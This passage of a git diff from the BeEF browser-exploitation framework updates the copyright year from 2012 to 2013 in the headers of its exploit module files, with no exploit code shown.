+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
index c111a2016..5eac5a4a0 100755
--- a/modules/exploits/beefbind/beef_bind_shell/module.rb
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
index 850858d5a..c0f65089b 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
index d824aefc0..02b3c6e20 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
index 62a042541..bd3a9aacd 100755
--- a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
index a456ebdc6..6522246c0 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
index e081ee76e..099017ee8 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
index d3960b92b..317e22e7f 100644
--- a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
+++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/command.js b/modules/exploits/camera/dlink_dcs_series_csrf/command.js
index 71fd886fd..4cfa20e8c 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/command.js
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
index 515f1faac..78347560b 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
index a96724404..5e56aaf61 100644
--- a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
+++ b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
index 6ab1c5d73..700e09603 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
index 7ff69cab3..84bb3bf33 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
index 6dc483e7b..ce946808e 100644
--- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
+++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/command.js b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
index 98992ae43..06062ca4a 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/command.js
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
index 09cae23bc..0f6e856c6 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
index 7dee12c51..d27fd77a9 100644
--- a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
+++ b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/glassfish_war_upload_xsrf/command.js b/modules/exploits/glassfish_war_upload_xsrf/command.js
index 1e0e2a8e3..9f1f3f0e0 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/command.js
+++ b/modules/exploits/glassfish_war_upload_xsrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/glassfish_war_upload_xsrf/config.yaml b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
index 53633a7ab..4e34daee3 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/config.yaml
+++ b/modules/exploits/glassfish_war_upload_xsrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/glassfish_war_upload_xsrf/module.rb b/modules/exploits/glassfish_war_upload_xsrf/module.rb
index 4b9586b13..199208d23 100644
--- a/modules/exploits/glassfish_war_upload_xsrf/module.rb
+++ b/modules/exploits/glassfish_war_upload_xsrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
index d30127f35..cae83679b 100644
--- a/modules/exploits/hp_ucmdb_add_user_csrf/command.js
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
index 50fc32640..dee13334a 100644
--- a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
index 9781327d7..26c7bfe4b 100644
--- a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/jboss_jmx_upload_exploit/command.js b/modules/exploits/jboss_jmx_upload_exploit/command.js
index 2fb1c10d2..3ac086fad 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/command.js
+++ b/modules/exploits/jboss_jmx_upload_exploit/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/jboss_jmx_upload_exploit/config.yaml b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
index 457c4efba..144002fbd 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/config.yaml
+++ b/modules/exploits/jboss_jmx_upload_exploit/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/jboss_jmx_upload_exploit/module.rb b/modules/exploits/jboss_jmx_upload_exploit/module.rb
index e18541ab3..17a537ac0 100644
--- a/modules/exploits/jboss_jmx_upload_exploit/module.rb
+++ b/modules/exploits/jboss_jmx_upload_exploit/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js
index 4d3e7cd71..838cddb0d 100755
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/local_host/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml
index 96022b207..d2caf410e 100755
--- a/modules/exploits/local_host/activex_command_execution/config.yaml
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb
index 20e0915dc..26f93d7c0 100755
--- a/modules/exploits/local_host/activex_command_execution/module.rb
+++ b/modules/exploits/local_host/activex_command_execution/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js
index f8938107f..52cdb5128 100755
--- a/modules/exploits/local_host/java_payload/command.js
+++ b/modules/exploits/local_host/java_payload/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/local_host/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml
index 47bb3370d..0988b5c10 100755
--- a/modules/exploits/local_host/java_payload/config.yaml
+++ b/modules/exploits/local_host/java_payload/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
index 5f83c6f18..ec911011b 100755
--- a/modules/exploits/local_host/java_payload/module.rb
+++ b/modules/exploits/local_host/java_payload/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
index bbf2f434b..65d91fd55 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
index 97be87d19..5f1cb6d94 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
index 74f7874bd..24bd2ad02 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js
index 10b0fefb4..80be2851b 100755
--- a/modules/exploits/local_host/safari_launch_app/command.js
+++ b/modules/exploits/local_host/safari_launch_app/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/local_host/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml
index 9d68e8df5..430662635 100755
--- a/modules/exploits/local_host/safari_launch_app/config.yaml
+++ b/modules/exploits/local_host/safari_launch_app/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb
index 2e3928be0..cde7068cf 100755
--- a/modules/exploits/local_host/safari_launch_app/module.rb
+++ b/modules/exploits/local_host/safari_launch_app/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js
index cebf54b9c..b908f1f0f 100644
--- a/modules/exploits/local_host/window_mail_client_dos/command.js
+++ b/modules/exploits/local_host/window_mail_client_dos/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/local_host/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml
index bdb6cf69f..898b5183b 100644
--- a/modules/exploits/local_host/window_mail_client_dos/config.yaml
+++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/local_host/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb
index 64860d890..8f311e62b 100644
--- a/modules/exploits/local_host/window_mail_client_dos/module.rb
+++ b/modules/exploits/local_host/window_mail_client_dos/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
index 560fd34e0..d4d663c23 100644
--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
index e4074df92..10d83aaaa 100644
--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
index ab9ffe2f4..bf5c68304 100644
--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js
index 6f03ea12f..d8a534aa2 100644
--- a/modules/exploits/php-5.3.9-dos/command.js
+++ b/modules/exploits/php-5.3.9-dos/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml
index 3617825ba..9b4730c2c 100644
--- a/modules/exploits/php-5.3.9-dos/config.yaml
+++ b/modules/exploits/php-5.3.9-dos/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb
index 6044f3550..a10bcf9b4 100644
--- a/modules/exploits/php-5.3.9-dos/module.rb
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js
index cffcf9489..4774eb8b4 100644
--- a/modules/exploits/qnx_qconn_command_execution/command.js
+++ b/modules/exploits/qnx_qconn_command_execution/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/qnx_qconn_command_execution/config.yaml b/modules/exploits/qnx_qconn_command_execution/config.yaml
index 9b54ea8fa..15bcba951 100644
--- a/modules/exploits/qnx_qconn_command_execution/config.yaml
+++ b/modules/exploits/qnx_qconn_command_execution/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/qnx_qconn_command_execution/module.rb b/modules/exploits/qnx_qconn_command_execution/module.rb
index 3a9e14124..2a3f8cb5d 100644
--- a/modules/exploits/qnx_qconn_command_execution/module.rb
+++ b/modules/exploits/qnx_qconn_command_execution/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
index 2c714f1c2..0c96f5688 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
index 6dfcb5a88..03f13e41d 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
index b393df84c..7d7af686c 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
